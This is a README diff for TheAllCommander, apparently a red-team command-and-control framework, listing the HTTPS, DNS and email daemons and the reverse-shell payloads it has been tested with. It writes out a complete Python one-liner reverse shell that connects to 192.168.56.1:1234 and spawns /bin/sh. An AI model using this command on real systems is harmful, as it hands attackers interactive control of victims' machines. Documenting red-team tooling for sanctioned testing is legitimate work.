matt-handy/TheAllCommander/README.md

 # Daemons
 Currently, TheAllCommander has been tested with the following payloads:
 1) Python.
 Currently TheAllCommander includes a HTTPS, UDP/DNS, and EMail emulation daemon.
 These daemons are in no way produced for operations in a real Red Team engagement, and are developed to serve as a template for further comm development.
 Both demonstrate use of these communication protocols in a comparable way.
+		Note: The email daemon is Windows specific and has not yet been ported to Linux.
 2) Msfvenom unstaged tcp payloads (windows/x64/shell_reverse_tcp and linux/x86/shell_reverse_tcp)
 3) "Python oneliner" ->  TheAllCommander can receive connections from python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.56.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call ([\"/bin/sh\",\"-i\"]);'
 		Note: This has been tested with /bin/sh and the $ will be removed to normalize IO with a Linux ncat shell